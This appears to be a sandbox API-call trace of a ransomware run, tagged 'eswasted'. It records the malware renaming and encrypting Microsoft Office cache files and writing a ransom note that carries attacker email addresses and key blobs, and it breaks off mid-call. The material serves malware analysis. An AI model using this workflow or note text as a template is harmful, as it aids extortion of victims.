[0071.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.303] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.304] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.304] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.304] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x93a [0071.304] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0x330000 [0071.304] CloseHandle (hObject=0x124) returned 1 [0071.306] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.307] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.307] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.307] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.308] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.308] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.316] SetEndOfFile (hFile=0x11c) returned 1 [0071.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.318] CloseHandle (hObject=0x11c) returned 1 [0071.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bb90 | out: hHeap=0x6d0000) returned 1 [0071.321] _aulldvrm () returned 0x0 [0071.321] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.322] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.322] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0071.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ae) returned 0x70b630 [0071.322] lstrcpyW (in: lpString1=0x70b6d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.322] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.322] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.323] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.323] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.323] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.324] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.325] SetEndOfFile (hFile=0x11c) returned 1 [0071.325] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.325] lstrcpyW (in: lpString1=0x70b6d4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted")) returned 1 [0071.326] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.326] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.326] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x4cf [0071.326] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0x330000 [0071.326] CloseHandle (hObject=0x128) returned 1 [0071.329] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.329] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.329] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.329] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.330] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.330] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.340] SetEndOfFile (hFile=0x11c) returned 1 [0071.342] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.342] CloseHandle (hObject=0x11c) returned 1 [0071.360] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.360] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c258 | out: hHeap=0x6d0000) returned 1 [0071.360] _aulldvrm () returned 0x0 [0071.360] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.362] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.363] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.363] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b630 [0071.363] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.363] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.363] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.364] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.364] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.364] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.365] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.366] SetEndOfFile (hFile=0x11c) returned 1 [0071.366] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.366] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.366] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.367] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.368] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.368] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x73c [0071.368] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0x330000 [0071.368] CloseHandle (hObject=0x124) returned 1 [0071.372] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.372] CloseHandle (hObject=0x128) returned 1 [0071.373] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.373] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.374] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.374] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.374] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.375] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.375] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312240 [0071.389] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.389] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]o1FEm5tkK3nkk8SS3NkOicFLGV6PXVxzDdNlU/44ULRl7Igbd1i1MkAmxSYFiQg9\r\nz17UQklIUzmcwjKZAglViKWeZwK88sHWaElRNFVi16DOHjFgMwcGrq3a129VE73A\r\nyKA8pZ9rSpODWmbHUo+FlzvD9VMoecRjunFMWKrKTK21cWfUsH2ykVbY++5m+eDq\r\n2GDCQJn0zeaIdT89Cu14MSaGIJ6NVPcs9c/ZO4EiuS/qOrPZ6lr08VktdghPN/P5\r\nMRSJwRBeMXSlHBGqcUgcdtGWf9Ay2w0UPSmVdfijcAEaJaZw3yM8/eXKSpGNmANQ\r\nLFa48+AHdTT7UJquhHL0fXkkCG+P+1hxeVTn6tEp+dCUsyhALVCjhCthryCZm4bZ\r\nIFzVnTjrgFz1B/2c8LZG8J6QZgPuuX+eDg5vzK/8ONXGLa86kOfQvdHgt6ZDvlpC\r\nzyfe4cwHn7TJmWXg/rvxNtDPlv7OOJFrUTTIvJEABuvOQVBahRDWkkKvXJIGJISJ\r\nCemRsyZay4OmVNNsLzLQZn9uX5v3Zl7vEY/N60bTidWsEtlomuPgD9ciOOltphpn\r\njHK1e5Rnu+n0n+lBkGO4DQsVmRqk6jz07HY5MG69zcbz/d7JotGtLGzR0Yc1YJVg\r\nHiwyQn3kO3seE/B9CcMacyi77c7shUIlIHZX0n61XMO=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.389] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.389] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.390] SetEndOfFile (hFile=0x11c) returned 1 [0071.393] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.393] CloseHandle (hObject=0x11c) returned 1 [0071.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0071.395] _aulldvrm () returned 0x0 [0071.395] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.396] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.396] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.396] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b630 [0071.396] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.396] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.397] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.397] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.397] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.401] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.402] SetEndOfFile (hFile=0x11c) returned 1 [0071.403] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.403] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.403] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.424] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.424] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.424] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x1861 [0071.424] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0x330000 [0071.425] CloseHandle (hObject=0x130) returned 1 [0071.429] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.429] CloseHandle (hObject=0x128) returned 1 [0071.429] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.429] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.430] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.430] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.430] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.431] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.431] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312620 [0071.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.442] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.443] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WHZcH5bH+hQKI6pQOtRKj5laAYhaMxRUC7ceUw7lH2/5K/APhNehiorcxgesrndw\r\nUC9cVnNA6DLP3mpTUjMlXHNoGpHFwY5lA0+MFLOEtDjVHzeKnpFaoYDRt7AYm80S\r\nHCG5WzjyTOs1LqWLYyiurjjwkneuCVl8gLPvfC2M2ulUJ9FffFfsBeZvBEyQMCqv\r\nAx6dZ7vKawzB0TyK7nB3LEALjhltWRRJAQCc5HjMF2Xzo2GVp9hI8ReiTXxBFqMq\r\n/Sr4+XQ0FNcWJWteMtKR8n00oA14NX99Sx8YdcFE1AypZd91PkwTnTLySyA1IuTl\r\nHeVX0KBh224yuBpC8P9Rm2vhswHC/JwwjUzZ1CTmgoxqRq8bYb/7hV/6aiZqzpo1\r\nI4r6c9rJNPbBp29/OGH9SQBjxTCkjeaVyfgEOfNamYDSOhcj83riajOgceGk6AEh\r\nI+ry4ZDOEG9oYhyztyruDz0mfSR9Qo5OtRakN0QFnXRzo5o3RPRrcrR1I0SAAIf0\r\nEP429ouVMPbsqw7luhfoIcUvTKI2HgCyjoJgFawKDQSoGrFkhe2zrRYBF/StwBJj\r\nrwR4fwyTPJRfI59Ewz4RBF9eVyfX8jzL/9n9vTiLGUJoEQqrjxfN1psvqkaAVt+z\r\ny+eFT+8AWll4MrRyfr+m3g5y/KzRbt/fi/6QDI6J8s+=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.443] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.443] SetEndOfFile (hFile=0x11c) returned 1 [0071.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.446] CloseHandle (hObject=0x11c) returned 1 [0071.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b8f0 | out: hHeap=0x6d0000) returned 1 [0071.451] _aulldvrm () returned 0x0 [0071.451] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.494] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.494] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.494] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0071.494] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x70b630 [0071.494] lstrcpyW (in: lpString1=0x70b6ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.494] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.494] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.495] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.495] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.496] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.497] SetEndOfFile (hFile=0x11c) returned 1 [0071.497] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.497] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.497] lstrcpyW (in: lpString1=0x70b6ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: 